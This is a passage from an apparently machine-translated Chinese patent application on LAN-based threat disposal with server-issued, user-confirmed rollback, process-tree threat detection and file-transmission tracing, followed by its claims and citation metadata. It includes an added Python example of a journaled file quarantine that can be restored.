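The earliest-event rule only identifies the entry point correctly if the file identifier is stable across terminals (a content hash rather than a file name) and the terminals' clocks are synchronised; both are operational requirements a deployment of this method would have to meet.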
For the device embodiments, since they are basically similar to the method embodiments, the description is relatively simple; for related parts refer to the corresponding description of the method embodiments.
Referring to Fig. 8, a structural block diagram of a LAN-based threat processing device according to an embodiment of the present invention is shown. The device is applied to a user terminal and may specifically include the following modules:
A first receiving module 801, configured to receive a threat disposal task issued by the server;
A disposal operation module 802, configured to perform a disposal operation on the threat object corresponding to the threat disposal task;
A second receiving module 803, configured to receive a disposal rollback task issued by the server for a target disposal operation that meets a preset rollback condition; and
A disposal rollback module 804, configured to roll back the target disposal operation corresponding to the disposal rollback task.
Optionally, the device may further include:
A prompting module, configured to present to the user the rollback information of the target disposal operation corresponding to the disposal rollback task before the disposal rollback module rolls back that operation;
and the disposal rollback module 804 is then specifically configured to roll back the target disposal operation corresponding to the disposal rollback task according to the user's confirmation operation on the rollback information.
For the device embodiments, since they are basically similar to the method embodiments, the description is relatively simple; for related parts refer to the corresponding description of the method embodiments.
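An added illustrative example, not code from the patent, of the server-side task issuing modules (701, 702) and the terminal-side receiving, disposal, prompting and rollback modules (801 to 804). The disposal operation is a file quarantine that the terminal journals so that it can be undone; the preset rollback condition used here, an administrator re-judging the disposed object as benign, is an assumption, since the text does not fix the condition. The sample file is created in a temporary directory.

```python
"""Added example (not code from the patent): threat disposal tasks with a
journaled quarantine and a user-confirmed disposal rollback."""
import os
import shutil
import tempfile
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class Task:
    task_id: str
    kind: str            # "dispose" or "rollback"
    threat_object: str   # path of the file judged to be a threat object
    operation: str = "quarantine"


class Terminal:
    """User-terminal side: modules 801-804 plus the prompting module."""

    def __init__(self, root: str, confirm: Callable[[str], bool]):
        self.quarantine = os.path.join(root, "quarantine")
        os.makedirs(self.quarantine, exist_ok=True)
        self.journal: Dict[str, dict] = {}   # task_id -> undo record
        self.confirm = confirm               # stands in for the user's confirmation operation

    def handle(self, task: Task) -> str:     # first / second receiving module
        return self.dispose(task) if task.kind == "dispose" else self.rollback(task)

    def dispose(self, task: Task) -> str:    # disposal operation module
        dst = os.path.join(self.quarantine, task.task_id)
        shutil.move(task.threat_object, dst)
        self.journal[task.task_id] = {"operation": task.operation, "from": task.threat_object, "to": dst}
        return "disposed"

    def rollback(self, task: Task) -> str:   # prompting module + disposal rollback module
        rec = self.journal.get(task.task_id)
        if rec is None:
            return "unknown-task"
        prompt = f"Restore {rec['from']} (quarantined by task {task.task_id})?"
        if not self.confirm(prompt):         # rollback information shown, user declines
            return "declined"
        shutil.move(rec["to"], rec["from"])
        del self.journal[task.task_id]
        return "rolled-back"


class Server:
    """Server side: first and second task issuing modules."""

    def __init__(self):
        self.issued: List[Task] = []
        self.verdicts: Dict[str, str] = {}

    def issue_disposal(self, terminal: Terminal, path: str) -> str:
        task = Task(f"T{len(self.issued) + 1}", "dispose", path)
        self.issued.append(task)
        return terminal.handle(task)

    def rejudge(self, task_id: str, verdict: str):
        self.verdicts[task_id] = verdict

    def issue_rollbacks(self, terminal: Terminal) -> Dict[str, str]:
        results = {}
        for task in self.issued:
            # Preset rollback condition (assumption): the disposed object was re-judged benign.
            if task.kind == "dispose" and self.verdicts.get(task.task_id) == "benign":
                results[task.task_id] = terminal.handle(Task(task.task_id, "rollback", task.threat_object))
        return results


def demo(confirm: Callable[[str], bool] = lambda prompt: True) -> dict:
    root = tempfile.mkdtemp()
    path = os.path.join(root, "suspect.bin")
    with open(path, "wb") as fh:
        fh.write(b"constructed sample")          # constructed file standing in for the threat object
    server, terminal = Server(), Terminal(root, confirm)
    disposed = server.issue_disposal(terminal, path)
    gone = not os.path.exists(path)
    server.rejudge("T1", "benign")
    rollback = server.issue_rollbacks(terminal)
    restored = os.path.exists(path)
    shutil.rmtree(root)
    return {"disposed": disposed, "gone": gone, "rollback": rollback, "restored": restored}


if __name__ == "__main__":
    print(demo())
```

Only disposal operations that leave an undo record can be rolled back this way; terminating a process or deleting a file outright has no journal entry to restore from, which is a reason to prefer quarantine over deletion whenever a later rollback is possible.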
The algorithms and displays provided herein are not inherently related to any particular computer, virtual system or other equipment. Various general-purpose systems may also be used together with the teaching herein. From the above description, the structure required to construct such systems is apparent. Moreover, the present invention is not directed to any particular programming language. It should be understood that various programming languages may be used to implement the content of the invention described herein, and the above description of a specific language is given to disclose the best mode of the present invention.
Numerous specific details are set forth in the specification provided herein. It should be understood, however, that embodiments of the present invention may be practiced without these specific details. In some instances, well-known methods, structures and techniques have not been shown in detail so as not to obscure the understanding of this description.
Similarly, it should be understood that, in order to streamline the disclosure and aid understanding of one or more of the various inventive aspects, in the above description of exemplary embodiments of the present invention the features of the invention are sometimes grouped together in a single embodiment, figure or description thereof. However, this method of disclosure is not to be interpreted as reflecting an intention that the claimed invention requires more features than are expressly recited in each claim. Rather, as the following claims reflect, inventive aspects lie in less than all features of a single foregoing disclosed embodiment. Thus the claims following the detailed description are hereby expressly incorporated into this detailed description, with each claim standing on its own as a separate embodiment of the present invention.
Those skilled in the art will appreciate that the modules in the devices of an embodiment may be adaptively changed and arranged in one or more devices different from the embodiment. The modules, units or components of an embodiment may be combined into one module, unit or component, and may additionally be divided into multiple submodules, subunits or subcomponents. Except where at least some of such features and/or processes or units are mutually exclusive, all features disclosed in this specification (including the accompanying claims, abstract and drawings) and all processes or units of any method or device so disclosed may be combined in any combination. Unless expressly stated otherwise, each feature disclosed in this specification (including the accompanying claims, abstract and drawings) may be replaced by alternative features serving the same, equivalent or similar purpose.
Furthermore, those skilled in the art will appreciate that although some embodiments described herein include some features included in other embodiments but not other features, combinations of features of different embodiments are meant to be within the scope of the present invention and form different embodiments. For example, in the following claims, any of the claimed embodiments may be used in any combination.
The component embodiments of the present invention may be implemented in hardware, in software modules running on one or more processors, or in a combination thereof. Those skilled in the art will understand that a microprocessor or a digital signal processor (DSP) may be used in practice to implement some or all of the functions of some or all of the components of the LAN-based threat processing method and device according to embodiments of the present invention. The present invention may also be implemented as a device or apparatus program (for example, a computer program and a computer program product) for performing part or all of the method described herein. Such a program implementing the present invention may be stored on a computer-readable medium, or may take the form of one or more signals. Such signals may be downloaded from an Internet website, provided on a carrier signal, or provided in any other form.
It should be noted that the above embodiments illustrate rather than limit the present invention, and those skilled in the art may design alternative embodiments without departing from the scope of the appended claims. In the claims, any reference signs placed between parentheses shall not be construed as limiting the claim. The word "comprising" does not exclude the presence of elements or steps not listed in a claim. The word "a" or "an" preceding an element does not exclude the presence of a plurality of such elements. The present invention may be implemented by means of hardware comprising several distinct elements and by means of a suitably programmed computer. In a unit claim enumerating several devices, several of these devices may be embodied by one and the same item of hardware. The use of the words first, second and third does not indicate any ordering; these words may be interpreted as names.
The invention discloses A1, a LAN-based threat processing method, applied to a server, including:
issuing a threat disposal task to a user terminal in the LAN, so that the user terminal performs a disposal operation on the threat object corresponding to the threat disposal task;
for a target disposal operation that meets a preset rollback condition, issuing a disposal rollback task to the corresponding user terminal, so that the user terminal rolls back the target disposal operation corresponding to the disposal rollback task.
A2, the method according to A1, wherein the threat object is detected as follows:
receiving the process behaviors reported by the user terminals in the LAN;
establishing, according to the process behaviors, the process trees of the user terminal at different moments and the mapping relations between each process in a process tree and its process behaviors;
obtaining from the process tree a target process that matches a preset process behavior pattern;
judging, according to the process behaviors of the target process, whether the target process is a threat object.
A3, the method according to A2, further including:
receiving a system snapshot at a certain moment reported by the user terminal;
and the step of establishing the process trees of the user terminal at different moments according to the process behaviors then includes:
establishing, on the basis of the system snapshot and according to the above process behaviors, the process trees of the user terminal at different moments.
A4, the method according to A2, wherein the process behaviors include process start/stop behaviors and/or memory behaviors and/or modification behaviors, and the step of establishing the mapping relations between each process in the process tree and its process behaviors according to the process behaviors then includes:
establishing, for each process in the process tree, the mapping relation between the process and its process start/stop behaviors and/or memory behaviors and/or modification behaviors.
A5, the method according to any one of A2 to A4, wherein the preset process behavior pattern includes:
a file-associated process starting a non-operating-system process; and/or
a process accessing and encrypting a second file after modifying a first file in the file system.
A6, the method according to any one of A2 to A4, wherein the step of judging whether the target process is a threat object according to the process behaviors of the target process includes:
sending corresponding alarm information for the target process, so that an administrator, on the basis of the alarm information and the process behaviors of the target process, judges whether the target process is a threat object; and/or
taking the target process, or a descendant process of the target process, as the process to be analyzed, and judging whether the target process is a threat object according to the execution parameters of the process behaviors of the process to be analyzed.
A7, the method according to A6, wherein the step of judging whether the target process is a threat object according to the execution parameters of the process behaviors of the process to be analyzed includes:
if a command-line script environment parameter contained in the execution parameters relates to script encryption behavior, the security detection result of the target process is unsafe; and/or
if a policy exclusion parameter contained in the execution parameters relates to bypassing an execution restriction policy, the security detection result of the target process is unsafe.
A8, the method according to any one of A2 to A4, further including:
if the target process is a threat object, obtaining the abnormal file involved in the target process, and obtaining, from previously acquired file transmission events, the file transmission events to be analyzed that correspond to the abnormal file; where the file transmission events are events reported by the user terminals in the LAN;
analyzing the information of the file transmission events to be analyzed, so as to obtain the transmission source and/or the affected user terminals corresponding to the abnormal file.
A9, the method according to A8, wherein the step of analyzing the information of the file transmission events to be analyzed includes:
obtaining, according to the time information of the file transmission events to be analyzed, the target file transmission event with the earliest occurrence time from among them, and obtaining the transmission source of the abnormal file according to the channel information of that target file transmission event; and/or
obtaining the affected user terminals corresponding to the abnormal file according to the terminal information of the file transmission events to be analyzed.
A10, the method according to A8, wherein the information of a file transmission event includes at least one of the following: time information, channel information, file information, file transfer direction and terminal information.
The invention discloses B11, a LAN-based threat processing method, applied to a user terminal, including:
receiving a threat disposal task issued by the server;
performing a disposal operation on the threat object corresponding to the threat disposal task;
receiving a disposal rollback task issued by the server for a target disposal operation that meets a preset rollback condition;
rolling back the target disposal operation corresponding to the disposal rollback task.
B12, the method according to B11, wherein before the step of rolling back the target disposal operation corresponding to the disposal rollback task, the method further includes:
presenting to the user the rollback information of the target disposal operation corresponding to the disposal rollback task;
rolling back the target disposal operation corresponding to the disposal rollback task according to the user's confirmation operation on the rollback information.
The invention discloses C13, a LAN-based threat processing device, applied to a server, including:
a first task issuing module, configured to issue a threat disposal task to a user terminal in the LAN, so that the user terminal performs a disposal operation on the threat object corresponding to the threat disposal task; and
a second task issuing module, configured to issue, for a target disposal operation that meets a preset rollback condition, a disposal rollback task to the corresponding user terminal, so that the user terminal rolls back the target disposal operation corresponding to the disposal rollback task.
C14, the device according to C13, further including:
a process behavior receiving module, configured to receive the process behaviors reported by the user terminals in the LAN;
an establishing module, configured to establish, according to the process behaviors, the process trees of the user terminal at different moments and the mapping relations between each process in a process tree and its process behaviors;
a target process acquisition module, configured to obtain from the process tree a target process that matches a preset process behavior pattern; and
a security detection module, configured to judge, according to the process behaviors of the target process, whether the target process is a threat object.
C15, the device according to C14, further including:
a snapshot receiving module, configured to receive a system snapshot at a certain moment reported by the user terminal;
and the establishing module then includes:
an establishing submodule, configured to establish, on the basis of the system snapshot and according to the above process behaviors, the process trees of the user terminal at different moments.
C16, the device according to C14, wherein the process behaviors include process start/stop behaviors and/or memory behaviors and/or modification behaviors, and the establishing module then includes:
a mapping establishing submodule, configured to establish, for each process in the process tree, the mapping relation between the process and its process start/stop behaviors and/or memory behaviors and/or modification behaviors.
C17, the device according to any one of C14 to C16, wherein the preset process behavior pattern includes:
a file-associated process starting a non-operating-system process; and/or
a process accessing and encrypting a second file after modifying a first file in the file system.
C18, the device according to any one of C14 to C16, wherein the security detection module includes:
a first judging submodule, configured to send corresponding alarm information for the target process, so that an administrator, on the basis of the alarm information and the process behaviors of the target process, judges whether the target process is a threat object; and/or
a second judging submodule, configured to take the target process, or a descendant process of the target process, as the process to be analyzed, and to judge whether the target process is a threat object according to the execution parameters of the process behaviors of the process to be analyzed.
C19, the device according to C18, wherein the second judging submodule includes:
a first execution parameter detecting unit, configured to set the security detection result of the target process to unsafe when a command-line script environment parameter contained in the execution parameters relates to script encryption behavior; and/or
a second execution parameter detecting unit, configured to set the security detection result of the target process to unsafe when a policy exclusion parameter contained in the execution parameters relates to bypassing an execution restriction policy.
C20, the device according to any one of C14 to C16, further including:
a transmission event acquisition module, configured to obtain, when the security detection result of the target process is unsafe, the abnormal file involved in the target process and to obtain, from previously acquired file transmission events, the file transmission events to be analyzed that correspond to the abnormal file; where the file transmission events are events reported by the user terminals in the LAN;
a transmission event analysis module, configured to analyze the information of the file transmission events to be analyzed, so as to obtain the transmission source and/or the affected user terminals corresponding to the abnormal file.
C21, the device according to C20, wherein the transmission event analysis module includes:
a first transmission event analysis submodule, configured to obtain, according to the time information of the file transmission events to be analyzed, the target file transmission event with the earliest occurrence time from among them, and to obtain the transmission source of the abnormal file according to the channel information of that target file transmission event; and/or
a second transmission event analysis submodule, configured to obtain the affected user terminals corresponding to the abnormal file according to the terminal information of the file transmission events to be analyzed.
C22, the device according to C20, wherein the information of a file transmission event includes at least one of the following: time information, channel information, file information, file transfer direction and terminal information.
The invention discloses D23, a LAN-based threat processing device, applied to a user terminal, including:
a first receiving module, configured to receive a threat disposal task issued by the server;
a disposal operation module, configured to perform a disposal operation on the threat object corresponding to the threat disposal task;
a second receiving module, configured to receive a disposal rollback task issued by the server for a target disposal operation that meets a preset rollback condition; and
a disposal rollback module, configured to roll back the target disposal operation corresponding to the disposal rollback task.
D24, the device according to D23, further including:
a prompting module, configured to present to the user the rollback information of the target disposal operation corresponding to the disposal rollback task before the disposal rollback module rolls back that operation;
and the disposal rollback module is then specifically configured to roll back the target disposal operation corresponding to the disposal rollback task according to the user's confirmation operation on the rollback information.

Claims (10)

1. A LAN-based threat processing method, applied to a server, including:
issuing a threat disposal task to a user terminal in the LAN, so that the user terminal performs a disposal operation on the threat object corresponding to the threat disposal task;
for a target disposal operation that meets a preset rollback condition, issuing a disposal rollback task to the corresponding user terminal, so that the user terminal rolls back the target disposal operation corresponding to the disposal rollback task.
2. The method of claim 1, characterized in that the threat object is detected as follows:
receiving the process behaviors reported by the user terminals in the LAN;
establishing, according to the process behaviors, the process trees of the user terminal at different moments and the mapping relations between each process in a process tree and its process behaviors;
obtaining from the process tree a target process that matches a preset process behavior pattern;
judging, according to the process behaviors of the target process, whether the target process is a threat object.
3. The method of claim 2, characterized in that the method further includes:
receiving a system snapshot at a certain moment reported by the user terminal;
and the step of establishing the process trees of the user terminal at different moments according to the process behaviors then includes:
establishing, on the basis of the system snapshot and according to the above process behaviors, the process trees of the user terminal at different moments.
4. The method of claim 2, characterized in that the process behaviors include process start/stop behaviors and/or memory behaviors and/or modification behaviors, and the step of establishing the mapping relations between each process in the process tree and its process behaviors according to the process behaviors then includes:
establishing, for each process in the process tree, the mapping relation between the process and its process start/stop behaviors and/or memory behaviors and/or modification behaviors.
5. The method of any one of claims 2 to 4, characterized in that the preset process behavior pattern includes:
a file-associated process starting a non-operating-system process; and/or
a process accessing and encrypting a second file after modifying a first file in the file system.
6. The method of any one of claims 2 to 4, characterized in that the step of judging whether the target process is a threat object according to the process behaviors of the target process includes:
sending corresponding alarm information for the target process, so that an administrator, on the basis of the alarm information and the process behaviors of the target process, judges whether the target process is a threat object; and/or
taking the target process, or a descendant process of the target process, as the process to be analyzed, and judging whether the target process is a threat object according to the execution parameters of the process behaviors of the process to be analyzed.
7. The method of claim 6, characterized in that the step of judging whether the target process is a threat object according to the execution parameters of the process behaviors of the process to be analyzed includes:
if a command-line script environment parameter contained in the execution parameters relates to script encryption behavior, the security detection result of the target process is unsafe; and/or
if a policy exclusion parameter contained in the execution parameters relates to bypassing an execution restriction policy, the security detection result of the target process is unsafe.
8. A LAN-based threat processing method, applied to a user terminal, including:
receiving a threat disposal task issued by the server;
performing a disposal operation on the threat object corresponding to the threat disposal task;
receiving a disposal rollback task issued by the server for a target disposal operation that meets a preset rollback condition;
rolling back the target disposal operation corresponding to the disposal rollback task.
9. A LAN-based threat processing device, applied to a server, including:
a first task issuing module, configured to issue a threat disposal task to a user terminal in the LAN, so that the user terminal performs a disposal operation on the threat object corresponding to the threat disposal task; and
a second task issuing module, configured to issue, for a target disposal operation that meets a preset rollback condition, a disposal rollback task to the corresponding user terminal, so that the user terminal rolls back the target disposal operation corresponding to the disposal rollback task.
10. A LAN-based threat processing device, applied to a user terminal, including:
a first receiving module, configured to receive a threat disposal task issued by the server;
a disposal operation module, configured to perform a disposal operation on the threat object corresponding to the threat disposal task;
a second receiving module, configured to receive a disposal rollback task issued by the server for a target disposal operation that meets a preset rollback condition; and
a disposal rollback module, configured to roll back the target disposal operation corresponding to the disposal rollback task.
CN201611250353.2A 2016-12-29 2016-12-29 LAN based threat processing method and device Pending CN106657102A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201611250353.2A CN106657102A (en) 2016-12-29 2016-12-29 LAN based threat processing method and device

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201611250353.2A CN106657102A (en) 2016-12-29 2016-12-29 LAN based threat processing method and device

Publications (1)

Publication Number Publication Date
CN106657102A true CN106657102A (en) 2017-05-10

Family

ID=58837123

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201611250353.2A Pending CN106657102A (en) 2016-12-29 2016-12-29 LAN based threat processing method and device

Country Status (1)

Country Link
CN (1) CN106657102A (en)

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN110659491A (en) * 2019-09-23 2020-01-07 深信服科技股份有限公司 Computer system recovery method, device, equipment and readable storage medium

Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN1885224A (en) * 2005-06-23 2006-12-27 福建东方微点信息安全有限责任公司 Computer anti-virus protection system and method
CN102932329A (en) * 2012-09-26 2013-02-13 北京奇虎科技有限公司 Method and device for intercepting behaviors of program, and client equipment
CN103390130A (en) * 2013-07-18 2013-11-13 北京奇虎科技有限公司 Rogue program searching and killing method and device based on cloud security as well as server
CN103618626A (en) * 2013-11-28 2014-03-05 北京奇虎科技有限公司 Method and system for generating safety analysis report on basis of logs
CN104462967A (en) * 2014-12-15 2015-03-25 北京奇虎科技有限公司 Method, device and system for file recovery

Similar Documents

Publication Publication Date Title
CN106650436B (en) A kind of safety detection method and device based on local area network
US10057284B2 (en) Security threat detection
US10356044B2 (en) Security information and event management
JP6894003B2 (en) Defense against APT attacks
US10601844B2 (en) Non-rule based security risk detection
CN106411562B (en) Electric power information network safety linkage defense method and system
EP2715522B1 (en) Using dns communications to filter domain names
JP5809238B2 (en) System and method for near real-time network attack detection, and system and method for integrated detection by detection routing
CN105939311A (en) Method and device for determining network attack behavior
TWI407328B (en) Network virus protection method and system
CN111212035A (en) Host computer defect confirming and automatic repairing method and system based on same
JP2015179979A (en) Attack detection system, attack detection apparatus, attack detection method, and attack detection program
Cheetancheri et al. A distributed host-based worm detection system
CN114050937B (en) Mailbox service unavailability processing method and device, electronic equipment and storage medium
CN106856478A (en) A kind of safety detection method and device based on LAN
US20210058414A1 (en) Security management method and security management apparatus
Yagi et al. Investigation and analysis of malware on websites
CN106657102A (en) LAN based threat processing method and device
Wonghirunsombat et al. A centralized management framework of network-based intrusion detection and prevention system
CN106856477B (en) Threat processing method and device based on local area network
CN107517226A (en) Alarm method and device based on wireless network invasion
CN113518067A (en) Security analysis method based on original message
CN113709130A (en) Risk identification method and device based on honeypot system
CN113206852A (en) Safety protection method, device, equipment and storage medium
WO2019186535A1 (en) Bio-inspired agile cyber-security assurance framework

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
WD01 Invention patent application deemed withdrawn after publication. Application publication date: 20170510